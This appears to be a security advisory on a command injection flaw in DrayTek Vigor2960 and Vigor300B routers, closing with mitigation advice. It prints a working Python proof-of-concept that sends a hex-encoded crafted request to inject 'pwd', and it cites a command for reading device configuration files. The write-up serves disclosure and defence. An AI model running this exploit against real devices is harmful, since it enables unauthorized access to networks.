Critical Command Injection Vulnerability in DrayTek Vigor Devices

Critical Command Injection Vulnerability Exposes DrayTek Vigor Devices to Remote Attacks

DrayTek Gateway devices, specifically the Vigor2960 and Vigor300B models, have been found to be vulnerable to a critical command injection flaw. This vulnerability could potentially impact over 66,000 internet-connected devices, making them susceptible to remote command execution and unauthorized access. The issue exists in the Web Management Interface of these devices, particularly in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint, due to insufficient input validation in the session parameter.

Attackers can exploit this vulnerability by sending a specially crafted HTTP request, injecting malicious commands into the device. Once successfully exploited, an attacker could execute arbitrary commands, gaining unauthorized access to the device and potentially compromising sensitive network data. For example, attackers could use commands such as pwd to display system directories or more sophisticated commands like cat /etc/persistence/config/device_in* to access sensitive system files.

Affected Devices:

• DrayTek Vigor2960
• DrayTek Vigor300B
• Software Version Affected: 1.5.1.4

The vulnerability stems from improper sanitization of the session parameter in the web management interface, which allows attackers to inject commands. A Python script demonstrates how the flaw can be exploited. This script sends a specially crafted request using a raw socket connection, bypassing typical HTTP processing, and executes commands on the target device.

Proof of Concept:

Here’s an example of the attack using the pwd command, which lists system directories.

The following Python code demonstrates how an attacker could exploit the flaw:

import socket
import socks

def send_http_request(host_ip, host_port, request):
    socket.socket = socks.socksocket
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((host_ip, host_port))
            request = bytes.fromhex(request.decode())
            s.sendall(request)
            print("HTTP request sent:")
            print(request)

            response = b""
            while True:
                data = s.recv(4096)
                if not data:
                    break
                response += data

            return response.decode('utf-8', errors='replace')
    except Exception as e:
        print("An error occurred:", e)

if __name__ == "__main__":
    host = ''
    port = ''
    
    # the injected command is `pwd`
    request_apmcfgupload_pwd_binary = b'474554202F6367692D62696E2F6D61696E66756E6374696F6E2E6367692F61706D63666775706C6F61643F73657373696F6E3D7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830B42535322463253532246370776420485454502F312E300D0A0D0A'

    response = send_http_request(host, port, request_apmcfgupload_pwd_binary)

    print("HTTP response received:")
    print(response)

Security Recommendations:

• Implement Strict Input Validation: Ensure all CGI script parameters undergo rigorous validation and sanitization to prevent command injection.
• Limit Access to Web Interface: Restrict access to the web management interface to trusted IP addresses, reducing the risk of external attacks.